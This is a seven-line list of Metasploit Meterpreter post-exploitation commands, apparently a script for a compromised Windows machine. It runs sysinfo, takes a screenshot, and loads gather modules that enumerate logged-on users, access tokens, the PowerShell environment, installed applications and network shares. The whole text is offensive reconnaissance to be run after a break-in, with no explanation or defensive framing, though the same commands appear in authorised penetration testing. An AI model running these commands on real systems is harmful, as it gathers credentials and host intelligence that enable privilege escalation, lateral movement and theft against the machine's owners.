sysinfo
screenshot -v -p gather.jpeg -v true
run post/windows/gather/enum_logged_on_users
run post/windows/gather/enum_tokens
run post/windows/gather/enum_powershell_env
run post/windows/gather/enum_applications
run post/windows/gather/enum_shares
